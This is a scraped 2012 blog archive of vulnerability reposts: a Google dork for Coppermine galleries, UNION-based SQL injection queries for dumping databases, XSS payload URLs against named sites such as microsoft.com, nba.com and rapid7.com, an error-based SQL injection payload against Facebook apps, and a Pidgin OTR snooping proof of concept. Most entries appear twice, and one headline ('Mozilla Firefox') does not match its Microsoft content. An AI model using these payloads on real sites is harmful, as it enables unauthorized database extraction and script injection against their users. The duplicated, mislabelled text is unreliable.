... neuere Einträge
Monday, 12. March 2012
Coppermine Photo Gallery – Upload Vulnerability
Am Monday, 12. Mar 2012 im Topic 'Vulnerabilities'
Google dork: “Powered by Coppermine Photo Gallery”
POC: http://[localhost]/Patch/upload.php
File:
jpg, xlx, txt, bmp, doc, mp4, etc
by
fikri-badboy
POC: http://[localhost]/Patch/upload.php
File:
jpg, xlx, txt, bmp, doc, mp4, etc
by
fikri-badboy
OWASP Mantra - URL Shortener Script - SQL
Am Monday, 12. Mar 2012 im Topic 'Vulnerabilities'
URL Shortener Script 1.0 SQL Injection Vulnerability
http://www.exploit-db.com/exploits/17937/
SQL Injection cheat sheets -
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ha.ckers.org/sqlinjection/
How to : Create a simple url shortener script is a few minutes
http://djpate.com/2009/08/09/how-to-create-a-simple-url-shortener-script-is-a...
Exploit-DB URL: http://www.exploit-db.com/exploits/17937/
Getting Databases: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select+concat(unhex(Hex(cast(schema_name+as+char)))) from information_schema.schemata limit LIMIT1,LIMIT2)--
Getting tables: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(table_name) as char)))) from information_schema.tables where table_schema=TABLE_INDIRECT)--
Getting columns: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(unhex(Hex(cast(group_concat(column_name) as char)))) from information_schema.columns where table_schema=DATABASE_NAME and table_name=TABLE_NAME)--
Getting Data: http://www.service.com/shortURL/show.php?id=1234.5 union all select (select concat(TABLE.COLUMN) from DATABASE.TABLE Order by COLUMN limit 0,1) --
Friday, 9. March 2012
ZetaBoards - XSS
Am Friday, 9. Mar 2012 im Topic 'Vulnerabilities'
by
st2tea
Sony
Thursday, 8. March 2012
Adobe Flash Player .mp4 'cprt' Overflow
Am Thursday, 8. Mar 2012 im Topic 'Vulnerabilities'
This vulnerability has been exploited in the wild as part of the
"Iran's Oil and Nuclear Situation.doc" phishing campaign.
Info
http://pastebin.com/ebvsLGBF
"Iran's Oil and Nuclear Situation.doc" phishing campaign.
Info
http://pastebin.com/ebvsLGBF
Wednesday, 7. March 2012
Mozilla Firefox - XSS
Am Wednesday, 7. Mar 2012 im Topic 'Vulnerabilities'
Microsoft official website(micrsoft.com) is vulnerable to Cross Site Scripting (XSS). The vulnerability is in the Products page url.
hxxp://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->alert('XSS');document.location.replace('http://ehackingnews.com')http://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->3Ealert('Simple XSS')
Code
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert("XSS")
by
flexxpoint
hxxp://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->alert('XSS');document.location.replace('http://ehackingnews.com')http://www.microsoft.com/en-us/together/possibilities.aspx
?hdrFo=mthdr02'"-->3Ealert('Simple XSS')
Code
hxxp://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"-->alert("XSS")
by
flexxpoint
Monday, 5. March 2012
nba.com - XSS
Am Monday, 5. Mar 2012 im Topic 'Vulnerabilities'
Details:
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
Parameter successURL in /webAction?actionId=emailFormRandom^Name=&Email=&Comment=&=Submit&=Reset&ReferringURL=&emailTo=technicalsupport%40nba.com&emailFrom=technicalsupport%40nba.com&successURL=%2F&subject=NBA.com+404+Error+Message is vulnerable to "+onerror="alert(1)" XSS input.
Proof Of Concept:
hxxp://www.nba.com:80/webAction?actionId=emailFormRandom
Tuesday, 28. February 2012
Pidgin - OTR information leakage
Am Tuesday, 28. Feb 2012 im Topic 'Vulnerabilities'
Details
libpurple is an Instant Messaging (IM) library developed by the Pidgin project. It is used by a number of IM clients including Pidgin and Adium. libpurple-based clients support the OTR (“Off-the-Record”) protocol either natively or via a plugin. The OTR messaging protocol enables users to communicate securely over any IM network.
pidgin-otr-snooping.py is a proof-of-concept Python script that connects to DBUS and prints all messages received via Pidgin’s “ReceivedImMsg” and “WroteImMsg” signals. The example below shows messages transmitted during an OTR conversation:
user@host:~$ python pidgin-otr-snooping.py
sent 'hey' to user1@example.com
received 'ho' from user1@example.com
sent 'lets go!' to user1@example.com
An exploited application that connects to DBUS (or reuses an already established connection) to listen for private messages provides identical forensic evidence (logs) as any application that connects to DBUS for legitimate purposes. It is thus difficult to identify in-memory eavesdropping of this sort, especially in cases where there is no supportive evidence that might suggest it (offending process image, related traffic logs etc.).
Download pidgin-otr-snooping.py
http://census-labs.com/media/pidgin-otr-snooping.py.txt
by
Dimitris Glynos
libpurple is an Instant Messaging (IM) library developed by the Pidgin project. It is used by a number of IM clients including Pidgin and Adium. libpurple-based clients support the OTR (“Off-the-Record”) protocol either natively or via a plugin. The OTR messaging protocol enables users to communicate securely over any IM network.
pidgin-otr-snooping.py is a proof-of-concept Python script that connects to DBUS and prints all messages received via Pidgin’s “ReceivedImMsg” and “WroteImMsg” signals. The example below shows messages transmitted during an OTR conversation:
user@host:~$ python pidgin-otr-snooping.py
sent 'hey' to user1@example.com
received 'ho' from user1@example.com
sent 'lets go!' to user1@example.com
An exploited application that connects to DBUS (or reuses an already established connection) to listen for private messages provides identical forensic evidence (logs) as any application that connects to DBUS for legitimate purposes. It is thus difficult to identify in-memory eavesdropping of this sort, especially in cases where there is no supportive evidence that might suggest it (offending process image, related traffic logs etc.).
Download pidgin-otr-snooping.py
http://census-labs.com/media/pidgin-otr-snooping.py.txt
by
Dimitris Glynos
Monday, 27. February 2012
Metasploit - rapid7.com - XSS
Am Monday, 27. Feb 2012 im Topic 'Vulnerabilities'
Homepage
http://www.rapid7.com/
XSS
URL:
hxxps://www.rapid7.com/register/metasploit-trial-key.jsp?product=Metasploit+Pro&returnPathURL=https:
//localhost:3790/setup/activation' onmouseover=alert(/Black.Spook/) bad='&whence=
by
black.spook
http://www.rapid7.com/
XSS
URL:
hxxps://www.rapid7.com/register/metasploit-trial-key.jsp?product=Metasploit+Pro&returnPathURL=https:
//localhost:3790/setup/activation' onmouseover=alert(/Black.Spook/) bad='&whence=
by
black.spook
Tuesday, 14. February 2012
Facebook - SQL Injection
Am Tuesday, 14. Feb 2012 im Topic 'Vulnerabilities'
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/viewmycalendar/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/viewmycalendar/index.php?page=1'
----------------------------------------------------------------------
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/lifesmile/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)
by
Ninja-Sec
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/viewmycalendar/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/viewmycalendar/index.php?page=1'
----------------------------------------------------------------------
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/lifesmile/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)
by
Ninja-Sec
Friday, 10. February 2012
Indianapolis Superbowl 2012 - SQL
Am Friday, 10. Feb 2012 im Topic 'Vulnerabilities'
Details:
========
1.1
A SQL Injection vulnerability is detected on the official website of Indianapolis Superbowl 2012 (US).
Remote attackers can execute own sql commands via remote orber by sql injection.
Vulnerable Modul(s):
[+] downloadRelease.php?id=
1.2
A blind SQL Injection vulnerability is detected on the official website of Indianapolis Superbowl 2012 (US).
Remote attackers can execute own sql commands via remote blind sql injection.
Vulnerable Modul(s):
[+] event-detail/?id=
by
Alexander Fuchs (f0x23)
========
1.1
A SQL Injection vulnerability is detected on the official website of Indianapolis Superbowl 2012 (US).
Remote attackers can execute own sql commands via remote orber by sql injection.
Vulnerable Modul(s):
[+] downloadRelease.php?id=
1.2
A blind SQL Injection vulnerability is detected on the official website of Indianapolis Superbowl 2012 (US).
Remote attackers can execute own sql commands via remote blind sql injection.
Vulnerable Modul(s):
[+] event-detail/?id=
by
Alexander Fuchs (f0x23)
... ältere Einträge
